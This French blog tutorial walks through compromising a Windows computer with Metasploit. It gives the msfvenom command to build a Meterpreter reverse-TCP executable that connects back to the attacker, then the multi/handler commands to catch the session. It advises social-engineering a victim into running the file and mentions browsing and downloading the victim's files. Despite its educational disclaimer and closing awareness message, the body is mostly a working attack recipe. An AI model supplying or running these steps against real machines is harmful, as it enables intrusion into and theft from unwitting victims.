Piratage d’un ordinateur via un payload conçu sur msfvenom

Piratage d’un ordinateur via un payload conçu sur msfvenom

Cet tutoriel est à but éducatif uniquement. Il a pour objectif de sensibiliser à la cybersécurité et de promouvoir de bonnes pratiques en matière de protection des systèmes informatiques.

Bonjour à tous j’espère que vous allez bien aujourd’hui nous verrons  Metasploit Framework, un outil  de développement et d’exécution d’exploits  permettant d’exploiter à son profit une vulnérabilité contre une machine distante.

Sans plus tarder, passons à nos claviers : Metasploit Framework est déjà installé sur Kali Linux donc nous allons directement passer à la création de notre Payload.

msfvenom -p windows/meterpreter/reverse_tcp lhost=[votre adresse Ip] lport=4444 -f exe -o /tmp/my_payload.exe

  • -p: le payload que nous voulons utiliser
  • lhost: l’adresse ip de l’attaquant
  • lport: le port
  • -f: l’extension du fichier
  • -o: le nom de sortie du payload ainsi que son son chemin de sorti

Après la création du payload, nous allons lancer msfconsole

Une fois Metasploit lancé, tapez cette commande pour charger le payload use exploit/multi/handler

après cette commande vous allez maintenant charger le payload que vous avez créé avec msfvenom

set payload windows/meterpreter/reverse_tcp

une fois le payload chargé nous allons maintenant tapez la commande show options pour renseigner nos informations

nous constatons que notre adresse ip n’est pas renseigné donc nous allons taper la commande set LHOST +votre adresse ip.

après avoir renseigné votre adresse ip retapez la commande show options et vous verrez que votre adresse ip est renseigné

Vous pouvez maintenant exécuter la commande exploit

nous devons maintenant utiliser le social engineering pour que notre victime exécute le payload généré avec msfvenom.

une fois cela fait voici ce qui apparait dans notre msfconsole

nous allons maintenant taper la commande la commande help pour voir toutes les commandes que nous pouvons exécuter

nous pouvons déjà utiliser la commande ls pour voir tout ces fichiers

nous pouvons utiliser la commande sysinfo pour voir les informations du système de votre cible

vous pouvez télécharger des fichiers importants de l’ordinateur de votre et faire plusieurs autres attaques en fonction de vos connaissances.

Le but de ce tutoriel est de vous sensibiliser aux dangers des téléchargements effectués en dehors des sites officiels et à l’exécution d’applications dont la provenance est inconnue.

 

 

 

Post Your Comment

Abonnez-vous à notre newsletter

En vous abonnant à notre newsletter, vous serez toujours informé des dernières actualités, offres exclusives et conseils personnalisés, directement dans votre boîte de réception.

Transformez vos ambitions, en Compétences Professionnelles

Facebook-square Linkedin Youtube
Formations
Services
Nous Contacter